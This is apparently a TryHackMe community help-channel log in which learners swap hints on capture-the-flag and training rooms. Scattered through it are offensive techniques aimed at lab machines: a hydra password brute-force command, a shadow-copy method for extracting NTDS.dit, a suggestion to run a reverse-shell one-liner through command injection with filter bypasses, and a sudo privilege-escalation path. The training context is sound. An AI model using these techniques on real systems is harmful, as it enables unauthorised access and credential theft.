Have you enumerated all the ports? ||Specifically 8009 + 8080||
i didnt think -p- could be a switch
im already in with ssh on the user and got user.txt, only need to privesc
ohhh
hold on
Ah, you found the files then? 😄
i did but dont know how to initiate connection with them lol
bruh
am i that stupid
open the .pgp file with the pgp private key...
ugh
No, you're probably over thinking it,
yeah i tried to priv esc with other things because im overlooking stuff lol
So you have access to the files now then?
One of them can be done with ||John||
ok im lost, encryption is a bit of a weak spot
I am stuck on the room "Intro PoC Scripting" --> https://tryhackme.com/room/intropocscripting, I don't know how is correct answer for this question: " Which HTTP response header allows us to send an authenticated POST request?". I read, read, read and still I don't know. Any tips?
The answer is in the task.
can i do anything with netbios-ssn on port 139?
It's in the prior section. "The cookie is formatted by reading the output of the..."
Something like that I suppose.
I also read the stupid text like 900 times.
=====
Hello guys, I am so confused at room "Wekorra" (https://tryhackme.com/room/wekorra) as follow
- If I do manual SQLi, I cannot get the table "wp_users" from "wordpress" database
- But if I use sqlmap, it can detect the table "wp_users"
→ What did I do wrong at here? Why the manual cannot find out the wp_users table?
I am having trouble with Task 4 Scanning of this room: https://tryhackme.com/room/rpnessusredux#
I'm not getting any vulnerabilities when I scan the Active Machine IP.
I deploy the machine, copy the machine IP, and then do the basic scan with the settings provided. Any idea what I am missing?
I've tried re-deploying the machine, and also read other posts and watched YT videos. I can't see what I am missing.
I'm currently working on the bonus question on https://tryhackme.com/room/burpsuiteintruder (Automate column_name discovery with BurpSuite Intruder using SQLi) but I don't want to do this without a wordlist. I've been going through /usr/share/wordlists on my attackbox and was unable to find a suitable one. Can anyone point me to where I could find a good list?
Thanks
Gave +1 Rep to @burnt rivet
No one can explain me about this?
This section might be helpful:
If you still need help I solved it today
hey can someone help me on task 6 subdomain enumeration
I am putting in the exact command but it doesnt work
try inputting seclists with all lowercase letters. when this room was made the seclists directory was spelled the way they have it. now it's all lowercase
Ok thanks
Gave +1 Rep to @wicked mirage
yw
it didnt work
can you send a screenshot of you putting in the command and then the output after you hit enter
I figured it out i forgot to tell sorry
Thanks for trying to help
Gave +1 Rep to @wicked mirage
anytime. mind telling me what it was? I'm just curious
yeah let me check
oh ok
i forgot to input the numbers for the size
Hi, I have an issue with the room ‘RazorBlack’ . || The issue occurs when I try to copy the ‘NTDS.dit’ to my current folder ( ex: C:\tmp ). Im creating my ‘shadow disk.txt’ and launch it from the target machine with diskshadow.exe /s c:\tmp\diskshadow.txt and I get the message The shadow copy was successfully exposed as h:'. Then I "import-module" both DLL's 'SeBackupPrivilegeUtils.dll' and 'SeBackupPrivilegeCmdLets.dll' . I can get the 'SYSTEM' file properly however when I try to get the NTDS.dit file with the following command : 'copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite' , I'm getting an error message saying 'it cannot find the path' meaning 'h:\windows\ntds\ntds.dit' is not the correct path. || Any suggestion ?
Can someone give me a hint about jack room? I found Wordpress users and when i try to bruteforce with rockyou seems taking forever... Am i on right path?
https://tryhackme.com/room/jack
Are you bruteforcing all users or single user?
All found users.
Wait for a while , you will get the pass
need a lil hint for chill hack room
||got a command injection at /secret , found etc/passwd but nothing special there. user apaar has local.txt and that only contains the word rce. thats all|| dont know how to continue for now
||hydra?||
If you were able to execute a command on /secret try to execute a revshell one liner…
@serene badger Although you may need to || bypass a filter for certain commands such as l\s -la or c\at index.php||
Ill read that once ive tried further
Heading home for now so could be an hour or 2
I am stuck in OSquery basic. I need hint for these 2 questions.
Which table stores the evidence of process execution in Windows OS?
One of the users seems to have executed a program to remove traces from the disk; what is the name of that program
you can use fasttrack.txt as password source. I had also not got any result with rockyou.txt
Got the password with fasttrack.txt under 5 min. Well done!
Not a hint I need I completed the room but ran into something during that I don't understand and hope someone can help me to. I was doing the Authentication Bypass room section Brute Force and it mentions that if you pipe the output into the username list then you may have to clean up the data first to be able to use the list. So I tried it as it was piped and it didn't work. I then opened with nano but there were special characters - why is this? I cleared all the extra formatting leaving only the usernames, saved and tried again but it didn't work and wouldn't work or show output with cat. In the end I just created the list with gedit. So how come nano had special characters when it was direct from the output and why when I removed it did show with cat? It looked like this in Nano: ^[[2Kusername.
does anyone know how to get the shell to get the flag for the third question on task 1 of "AV Evasion: Shellcode"?
same question does any one have a hint
looking at the room Theseus - stuck on the final part of it, after ||getting a session as the ariadne user||. There is a file I can't make sense of, and a private key I can't use. Anyone want to drop me a hint?
First one, you gotta search for "execution" table in the documentation, the answer is ||userassist||
2nd question I am stuck at still :\
In the room Simple CTF (https://tryhackme.com/room/easyctf), can someone point me to where I could find information on the privilege escalation part (Second to last question)?
If you select Help You'll see Writeups
If that's what you're looking for?
Hmm I'm reluctant to look at those, because of them potentially giving it away completely, but I got a hint from Mac. Thanks anyways 
Yeah, that is true.
That's why I avoid them, some even give you the flag/answer which is not good either (unless you learn something from doing it that way).
Thank you for the list C: Skipping the spoiler for now.
Gave +1 Rep to @burnt rivet
Figured it out 
Hi! Can someone give me a hint what to look for in the Ignite room?
||I got a bad but working shell with https://www.exploit-db.com/exploits/50477 but I don't know what to look for now.. ||
Edit: got the user flag, don't know how i could miss that lol
For Pyramid of Pain - I found the answer that was is a ASN. I've tried a dozen searches but all that comes up is "autonomous system" is this what the ASN is that is being referred to in the quiz question?
"What is the ASN for the third IP address observed?"
can someone tell me the ans of bank page
Asn is autonomous system number, like AS123456
hey, I need a nudge regarding "Crypted"
im struggling to get anything at all cracked with hashcat. if I have a hash that's something like $<1char>$<10chars>.<29chars>.<4chars>/<10chars>.<40chars>, other than using the first few chars for choosing the mode, how do I make sense of what the rest of the hash is? Seems the second part is the salt... how do I specify salt with hashcat? also with a bit more googling it looks like '/' is a potential output character for sha...
For Pyramid of Pain, can someone help me? It's the only response missing:
Use your OSINT skills and provide the name of the malicious document associated with the dropped binary
@grand nebula so what did you use in the question "Using your OSINT skills, what is the name of the malicious document associated with the dropped binary?"
@grand nebula actually not that one but "Use the tools introduced in task 2 and provide the name of the malware associated with the IP address"
@grand nebula for a more specific hint look at the screenshot just above the questions, don't you find it familiar?
Yeah I was looking for some hints, i've realized that it's a tricky question
@grand nebula not at all, it's so basic you will facepalm yourself 😄 like I did
but yeah the hint is in the screenshot and is a combination of things that you have done until that point
Seems that i'm gonna end tilted if i find the answer lol
I would appreciate it
I was like 2 hours trying to figure out the answer before asking for help
have you tried <any.run>?
Either im dumb or Task 9 on Pyramid of pain doesnt want to give me the flag or im just wrong
can anybody give me a hint on how to find the decryption key on Crypted room please
Im stuck here too haha...any advice?
Any hints appreciated. I tried every combination there is. Also of the text in the picture. It is an abbreviation or ..?
Like you and many others, only problem with question 3. Any hints appreciated because I'm still stuck.
RE: https://tryhackme.com/room/torforbeginners
Access the website below and capture the flag by copying bitcoin address at the bottom of the page!
http://danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion/
The Bitcoin address posted on that page is the incorrect answer.
IIRC.
The page no longer works and the hint is the answer.
The page did work for me when I opened it.
Home
Hello, my name is Daniel and this is my personal website, that I develop in my free time. This site is available as Tor hidden service or via my clearnet proxy danwin1210.de.
This is just the landing page, you can navigate to the pages that interest you most by clicking on the entries in the navigation bar on the left.
You can download my PHP Chat based on LE-CHAT on GitHub. The onion link list script is now also available for download on GitHub. The setup I use for hosting is now also available on GitHub
If you like, what I've built here, you can support me by donating via Monero: 432Z3PTrRso52GHHpmPRpvLhecsnc7EFsVd2TzsCJaNmK4vivDxghRB5yVCj2nzCEGajeF3rBqJ43PcpxRnvZkMs49fufzD , Ethereum: 0xFbd055EEeA3b5a3459FeC6A8FAe631305b1079A0 , or Bitcoin: bc1q8jcfxsmcz7lhk7g9urnzxpwhxsje2n2gz34cya . More options available, just contact me.
Was published on the page.
Ok,.
The bitcoin address is wrong.
The answer is the hint.
Maybe im missing an option on the site. But is it possible to turn off the answer format in rooms on tryhackme? I find it sometimes a bit too helpful and i will just be looking at the length instead of properly reading the question and knowing the answer myself
No, there isn't.
Thanks for the quick reply!
Gave +1 Rep to @lucid junco
I have a question regarding the room Brute Force Heroes, so I'm wondering before I launch the attack within burpsuit whether or not it will matter if I have switched the foxy proxy off.
*Burpsuite.
You can remove it through dev tools
And use something like tamper monkey
In the Pyramid of Pain room Task 5 question 2 is asking us to use either metadefender or virustotal to provide the name of the malware associated with the IP address. I entered the IP address 35.214.215.33 and both found it to be safe. Is anyone else getting this?
Was able to find it using google dorking. It's associated with Emotet.
I am having trouble with Task 9 on the Pyramid of Pain room. I have tried everything that makes any sense at all. I have even tried many combinations that make no sense. I can not get the flag. Can someone help me? Thanks in advance.
The task is broken if I recall correctly. You should be able to advance regardless
The task can be done.
Hey guys I'm facing a problem in the gallery room;
mike@gallery:/tmp$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on gallery:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
mike@gallery:/tmp$ sudo /bin/bash /opt/rootkit.sh
sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.
mike@gallery:/tmp$ sudo /bin/bash /opt/rootkit.sh
sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.
@fresh grove I believe those are separate. Eg: | sudo -u root /bin/bash | and | sudo - u root /opt/rootkit.sh |
Did you google that error and try the solutions that come up with it ?
This is not an error.
mike@gallery:/tmp$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on gallery:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
Error opening terminal: unknown.
Yeah I think it's because I didn't upgrade the shell properly some how.
I added the -u to specify the user. The box I did yesterday had sudo privileges for another user besides root on the machine. So had to escalate from www to user to another user to root.
Oh...
I think it had something to do with not upgrading the shell properly @vital estuary I'll have to read up on doing that properly.
have you figured out how to upgrade a shell
Not right now....
I'm trying to figure out where the public rsa key I created went to @vital estuary .
look up upgrading to tty shell
I'm working on a different room now 🙂
it might have got saved to a hidden folder use ls -la to show all files and folders it should be in .ssh
Apparently it went here;
/home/su8z3r0/.ssh/id_rsa
Well at least that was the output of;
ssh-keygen
Though when I go to that directory there is only one file in there called "known_hosts"
Hi there,
I'm kinda stuck on the Lazyadmin CTF.
I've already seen many posts about this, I've reached the user flag and trying to leverage the sudo -l weakness I found.
|| I tried to modify /etc/copy.sh file but whatever I do, I always get as answer a password ask from sudo.||
I can't understand how to use what sudo -l returns. Does anyone have a small hint to help me a little ? 🥺
You should already have write perms on that file.
I can't find answer for this question. Any hints
Machine name : tempest
Task 7
Q: The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?
Only this question is left 🥺
what room
i havent done that srry
Sorry but I'm not sure to understand (I'm an eternal rookie).
I do not have permission issues, copy.sh can be executed by any user.
You should be able to echo in to the file, I think that's what I done,
Yes, that's what I did. But I just understood what was wrong.
|| I didn't use the whole path of the command, I was only doing /usr/bin/perl or /home/itguy/backup.pl, not both to launch the command, now it's ok||
Anyway, thanks for your time 😉
Gave +1 Rep to @lucid junco
Hi guys I'm working on the Fowsniff CTF room and I'm having trouble with one of the hashes;
a92b8a29ef1183192e3d35187e0cfabd
I used hash-id to find out what it was then got this;
HASH: a92b8a29ef1183192e3d35187e0cfabd
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
So then I use Hashcat to try and crack it though nothing.
DM if you are still stuck.
in the Linux Privilege Escalation room at the Kernel Exploit practice did I find the right CVE? i found the following:
HI .. I have started room https://tryhackme.com/room/breachingad Question is : -
What is the username of the third valid credential pair found by the password spraying script?
When I am trying to reach http://ntlmauth.za.tryhackme.com/ through browser , it is not working. I guess DNS has not been configured properly. Tried mentioned way but not working , please help
Hello everyone I’m learning the Linux fundamentals part 2, trying to login to the SSH but it keeps saying wrong password…. “tryhackme” was supposed to be the right password it doesn’t work please does anyone know how I can solve that please ? Thank you
@devout crag are you using the attackbox?
@woeful plaza have you figured it out yet
@fleet basin yes ..
I try with both attackbox and Linux machine it doesn’t work
Can I have the IP of the target machine ?
@devout crag ok just to make sure, after you started the attackbox (blue button) you also have to start the machine. (Green button).. then use attackbox to ssh in to machine
hello, I don't understand first question in task 4 of the room "Pyramid Of Pain" under SOC Level 1 learning path
I would love hint, I can't find that one "malicious URL"
oh actually no, I just refreshed website and now It's working again
PRO tip I just learnt: after you suspend system, restart website in order to work xd
Hey ppl, so I am on my first lessons on TryHackMe and the task where it involves bank transfer. I do enter the right answer that is shown on my account balance but it keeps saying incorrect. I already verified my account so... 
pls provide us with room name and task number
Intro to offensive security task 1
what is that "right answer" you entered?
$767.68 which is the balance after transferring the 2000
so, the question is not asking you how much money you have right now, It gives you a flag which indicates that you have made right move, refresh page and then try to find a word that wasn't there before
if you still don't find it you can call me in dm I can show you how to do it, or else I can just provide you with right answer but that is not fun, try to re-read question again and you will figure something out
I will re-read it thanks for the hint. ✌🏼
Gave +1 Rep to @old dew
alright! best of luck
I’ll do that now thank you
Gave +1 Rep to @vital estuary
Got the answer thanks! 🕺🏼
Gave +1 Rep to @old dew
@devout crag were you able to ssh into that machine?
I’m good now
nicee!!! good job! keep the great work on!
sometimes you need to type your answer not copy paste for validation.
sometimes if you copy paste with your clipboard then paste things on your terminal or browsers.
I'm in task 4 on network services and im running kali linux on oracle virtual box and I am running the right command "smbclient //{ip}/profiles -U -p 445" but after using "anonymous" for the username and not using a password (just hitting enter) it tells me host is unreachable. It worked for the tutorial on youtube. While I could just use the answer from youtube I would rather try to figure this out but I am stumped.
Actually it says connection to {ip} failed
can u ping?
It wasn't coming up for me either. Makes me think the task might be bugged, or the ip address no longer gets flagged.
Hey everyone, I'm having trouble with File Upload Vulnerabilities room, Task 8: Bypassing Server-Side Filtering: File Extensions
I'm wondering if there is currently a known bug in this room's vm or if I'm just not on the right track.
Problem
Not trying to give away too many details but I'm noticing when I upload certain file types or file type combinations that I'd expect to work It's telling me File must be chosen before being uploaded.
I've looked at a past walkthrough of this room that was posted back in June and as I expected the file type that I chose to upload to test should have worked.
I've tested this on both the Attack box as well as my vpn and neither have worked.
Appreciate any help/hints you all can throw at me. My DM's are open if you do not want to expose too much about the room.
UPDATE: I restarted the VM and it magically worked 🤦♂️
Hi, I'm in room Simple CTF, as far a a vector goes is the fact that ssh is running on a non standard port a potential vulnerability? Seems suspicious to me
Not really
Alright, I'll keep looking
Task 5 Question 4 on Pyramid of Pain room is messing me up lol
There are two of the same questions but with a different answer lengths. I found the answer to the first one
{Found it}
I search the tryhackme forums and got my answer.
The answer was right in front of my face lookin at app.any.run
Loving it !
really teaching you how to spot malicious activity and giving you resources for tools on how to do this ! so freaking amazing!!!

Working on REmux The Tmux would someone plz give me a clue for this question?;
How to reattach to a detached tmux session with the session name of "thm"
It's mentioned no where in the lesson how to do this.
└──╼ $man tmux | grep -i 'detached'
tmux is a terminal multiplexer: it enables a number of terminals to be created, accessed, and controlled from a single screen. tmux may be detached from a screen and continue running in the
clients attached to the session are detached. If -x is given, send SIGHUP to the parent process of the client as well as detaching the client, typically causing it to exit. -r signi‐
When enabled, focus events are requested from the terminal if supported and passed through to applications running in tmux. Attached clients should be detached and attached again af‐
If on (the default), the client is detached when the session it is attached to is destroyed. If off, the client is switched to the most recently active of the remaining sessions.
client-detached Run when a client is detached
[detached (from session ...)]
The client was detached normally.
[detached and SIGHUP]
The client was detached and its parent sent the SIGHUP signal (for example with detach-client -P).
A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:
└──╼ $man tmux | grep -i 'reattach'
background, then later reattached.
Each session is persistent and will survive accidental disconnection (such as ssh(1) connection timeout) or intentional detaching (with the ‘C-b d’ key strokes). tmux may be reattached using:
The update-environment session option may be used to update the session environment from the client when a new session is created or an old reattached. tmux also initialises the TMUX variable
A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:
Couldn't find anything in the manual either.
there's nothing after 'A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:' ?
seems like the answer would be there x)
'A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:'
This isn't even in the page.
Same as this question.
How to switch between two or more tmux sessions without detaching from the current tmux session?
Nothing in the lesson teaching how to do this.
I cant say I have done this room, can you link it to me? Ill check with you 🙂
Gave +1 Rep to @topaz umbra
One would think a keyword search for "switch" would locate the information though no success.
This room is a disaster !!!!
I'd have better luck trying to find the pot of gold at the end of the rainbow than being able to find the answers in this lesson.
lots of tasks in this room I see 😄
Task two it is.
It's not that. Rather the lesson doesn't provide the information needed to answer the questions.
Yeah.....
It's worse than that.
The answers are simply not even there.
I think someone needs to review that room, it should be reported to staff members.
im just trying a few things, Ive got no experience with tmux pretty much
yeah it could do with an upgrade. You can send a feedback mail via #feedback-and-ideas about this room?
ok I got the answer but it was pretty much by guessing a bit
Yeah... I think it's necessary.
Especially considering that it is an "info" room.
Things like this would easily dissuade new users !!!
so looking at the amount ** for the blanked out answer in combination with the flags in the man page to attach a session + the hint the room gives, I ended up with the correct answer
if that is helpful for you 😅
Yeah that's what I was doing.
I couldn't find many answers for that room, I will go back to it later on.
That room has Dementia !!!!!!!
Forgot to include the instructions !!!!!
Dementia is a scary thing.
Quickly scours the internet for all foods that can prevent it.
Hey @topaz umbra do you know the site that has bash shells posted up ?
I found it in a room I was doing the other day though now I cannot remember the site.
Hello, i'm doing linux fundamentals part 1, and when starting the machine, the attackbox doesn't spawn, and when trying to log via ssh to user linuxfundpart1v1 it asks for a password, so i can't access the machine to answer the questions
It's a split screen machine.
yeah but it doesn't spawn when starting the machine
Look up the top, there might be a "slow split screen" button
oh ok that was it, thanks, looked the tutorial and the split view spawned when he started the machine, didn't know i had to do that
Sometimes it auto starts, sometimes it doesn't.
For me anyway
Plus it's an old video, so they might have changed it since then.
in windowsprivesc20 room under abusing service misconfigs, im finding that the part where it states "you have been assigned privs to restart the service yourself to save time" doesnt seem to be true... i cant restart the service, it let me stop it, but wont let me start it.
am I missing something here?
now things are acting weird... i cant get access to the machine after trying to start over... rustscan says port 3389 isnt even open lol
successfully performed the DOM XSS question but no flag reveal.... any clues?
(OWASP Juice Shop, Task 7)
Success using Kali VM rather than browser attackbox 😦
I'm working on the JavaScripts Basic room, task 8 question one. Can someone give me a clue plz.
I've tried the different types mentioned in the lesson;
The three most common types that I've seen of XSS are DOM-Based XSS (type-0 XSS), Reflected XSS (Non-Persistent XSS), and Stored XSS (Persistent XSS):
I still couldn't figure it out.
hello there i am in ra2 AD didn't get anything on responder
done
-ban 1040267661134790719 -ddays 1 spreading grabify links
🔨 Banned 1040267661134790719 indefinitely
Hello, someone can give me a tip for room: Basic Malware RE - challenge 1
What do you need to access a web application ? (on path: Intro to Cyber Security, room: Web Application Security) it sounds like a simple question, but I do not know why whatever I input the answer is wrong
Hi. I am doing Linux Fundamentals part 3, task 8 and I have a problem in finding the folder Apache2 they say.
apache2 does not appear in the folder /var/log in the Linux machine given by the page
stuck on this question linux privesc room
Lets replace the contents of the file with our payload using: "echo [MSFVENOM OUTPUT] > autoscript.sh" whats the output is it located elsewhere
having trouble catching a shell
windows local persistence room task 2 - is thmuser0 a typo and supposed to be thmuser1? Im finding the steps and how they relate to the overall goal kinda unclear...
CCT2019, crypto1c (last challenge/last task). Anyone an idea what it could be? (Compression, encoding or encryption) " 011221121413111121231312222111216212111241122132211121621121131141631132114211211322216222224113213113316112211214131111212313122221112163221214...." I (in total 1022 chars) I've been trying to solve this puzzle for 2 days, but I can't figure it out. IMO could be RGB (w/o numbers 7,8,9) but no idea where to put the separation for the pixel and how to find out the resolution.
All i can say is that the solution is something a lot more simpler than what you think, and i mean a lot.
Thank you. I'll try to think a little more simply. 😉
Gave +1 Rep to @vague pine
hey people!
thanks for your time in advance to whoever will help me out
I am stuck on Linux fundamentals 3, task 6. I just can not figure out when will the crontab run on the terminal to answer the question
I tried writing "12 hours" in every imaginable way (even in french lol)
if you check the crontab on said target machine there is only 1 entry.... it starts with a ||@||
Wow thank you for being so quick to answer!
I'll check that out when I get back from work
Gave +1 Rep to @alpine kestrel
good luck and have fun
has anyone completed warzone2?
there's also #1045776041819512862 I just saw 🙂 in the recent releases channels
dedicated to the room
lol nice, thanks again
haha no worries
Evening all. I'm trying out room 'Cyborg' and I'm pretty sure I just got a pair of credentials. I'm assuming they are connected to a 'squid proxy server' that the machine should be hosting. I don't know anything about squid though. Would reading up on the service be aiming in the right direction for the challenge or would I just be barking up the wrong tree?
Give it a quick read. You will know what to do next.
Is it possible to solve the challenge with pen and paper only?
Yes, totally. Albeit it would take some time and would be boring.
Thanks for the reply. The holidays always mean me being overworked, didn't want to waste what little time I have on a false lead. I'll dig in to it though
Gave +1 Rep to @pine dust
👍🏻
task 5
oops...^ meant for trying to find txt in this chat....I guess I can ask though. I see a lot of people had trouble with Task5 Q4 in the Pyramid of Pain, and I was able to get that answer before coming here, but Q5 is literally the same question and none of the files in the photo are the answers....what the heck! any hints?
Evening. I'm on room "cyborg" I managed to get ssh creds and I'm looking for a vector for privilege escalation. I notice the user is able to run a backup.sh as sudo for these mp3 files. Is this potentially my path to root?
Read the script and you will know 👍🏻
Hey guys
i have question about "Road"
someone that could possibly help i dont want to open the writeup immediately
just ask the question 🙂 you'll get quicker response
so
i'm still busy with finding the first entry point
i tested ffuf, gobuster, nmap, created an account on the page but didnt find anything till this point
what did i miss
i can see there is an api
Keep going through the page you have logged in to. That's the most i can say right now.
Try to find a way to take over that account.
the key looks wrong there can't be spaces eg
anyone, I can't figure out how to do this, can't seem to match pattern. First I thought I'll have to use ^n-z to not involve it in the 4th position of the word but it seems I'm wrong so How do I match the expression for this??
weird but this has been marked as the answer
doing the UKC room
question is about '
What is an example of a tactic to gain a foothold using emails?
'
i would think it's delivery, but seems not to be correct
small hint maybe?
I don't know the answer, but i guess it is more about the technical aspect like what could you deliver to them or what can you fake
ahhhh ok, now i got it
that's phishing of course
thanks @woeful crag to enlighten me 😄
Gave +1 Rep to @woeful crag
i'm not natively speaking english/american so sometimes i interpret the question wrongly
but now that you put it another way
🙂
hi im doing the Year of the rabbit
im stuck at rickroll vid ( javascript disabled one not Youtube video one )
i watched it
it says im in the wrong place
i dont rlly knw what to do with ssh and ftp tho
|| /intermediary.php?hidden_directory=/WExYY2Cv-qU || i also found this one while testing out in burpsuite
What did you find when you visited that directory ?
it redirected to the rickroll video
how do i mark spoiler ?
|spoiler|
two bars
havent yet
i only visited || /intermediary.php?hidden_directory=/WExYY2Cv-qU ||
also visited || /intermediary.php ||
Well, that's your clue.
thanks dude
Gave +1 Rep to @pine dust
room: Jack-of-All-Trades; initial access vector is gained through a long and shitty steg puzzle, but once you get in there is no obvious escalate to root. there is a SUID bit on a binary that allows one to read privileged files via $LFILE, and thus read the root.txt flag. i am not satisfied unless i escalate to root and i dont understand why out of 20 write-ups, no one has done it. i could run dirtyc0w, but that's a cheat IMO. so i found port 25 running locally on 127.0.0.1, which i forwarded via SSH tunnel and found it's Exim 4.84-3 which has a root exploit. however, it does not work locally and i don't think that is a way to root. not sure if anyone wants to help me find a way to root! LMK
Hey! I'm stuck in the MITRE room, Task 8. I identified ||APT33|| as the group, ||Cloud Accounts|| to focus on, specifically the ||ruler|| tool. I also figured out the platforms. But I can't figure out the question starting with "Per the detection tip". Any hints?
Same question here, but no answer: https://discordapp.com/channels/521382216299839518/522158539129618453/1043238841584210001
Check out MITRE > Cloud Accounts.
Thanks for your pointer. I read the "detection" section of the page several times but wasn't able to figure it out. After running the text of the page through a regex with the format structure (word 8 chars followed by "or" followed by a word with 9 chars and another word with 8 chars), I figured it out. But honestly, I don't think this is an effective question.
Gave +1 Rep to @cloud shard
In addition: ||abnormal or malicious behavior|| can be written in different ways (US and UK english).
hi
Hi. I’m not looking for a hint specifically but would like to know why my first hydra command didn't work, can anyone help? I've completed this room: https://tryhackme.com/room/hydra
The following is my command I first tried and I see I didn’t properly specify the url: hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.160 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
This version returned a list of usernames and passwords (all for ‘molly’)
I see that DarkSec’s walkthrough specified ‘login’ and when I tried it it only showed the one password for molly: hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.160 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
So I want to know why the first version returned so many passwords for the user molly. I tried some and they didn’t work but the colored syntax made them look like successful ones.
I'm not 100%, but I would guess hydra identifies positives from http response codes (e.g. 2XX - positive, 4XX - negative). So when you were sending credentials to the wrong endpoint, you were actually just requesting the home page again and again and the site was returning it with a status code 200, so Hydra assumed that all these attempts were positive.
i’m also not sure but i guess that hydra is looking for the failure message on the page but since the endpoint is wrong, its getting a different message and it considers that a valid password.
Please point it out if I’m wrong.
i think this is it, id forgotten that you can specify the failure message in the params.
Don't feel bad. I'm so confused, I don't know if i'm in the right room @white salmon . I just started last night and watching the video and i feel lost
Hello!
Trying to solve the CCT2019 room. Unfortunately I'm stuck on TASK4 - last flag. I have no idea what to do with the string of numbers I have. any hint?
Check out my questions above on the subject. I can only give you a tip to think much simpler than in the tasks before. 😉
Click on Go to this report on app.any.run to see the answer to your first question under click connections see the first one under domain
Thank you
Gave +1 Rep to @polar finch
Thank you
Sup guys,
Anyone free to help me on snort challenge1 room? stuck on the rule for task 3 number 3
Is this the Snort Rules: Ep.3 – HTTP?
It's in the module "Snort Challenge - The Basics", and it's Task 3 "Writing IDS Rules"
It's part of the SOC Level 1 learning path
Figured it out (I was tryna be fancy and make and use $HOME_NET instead of just 'any'), thx tho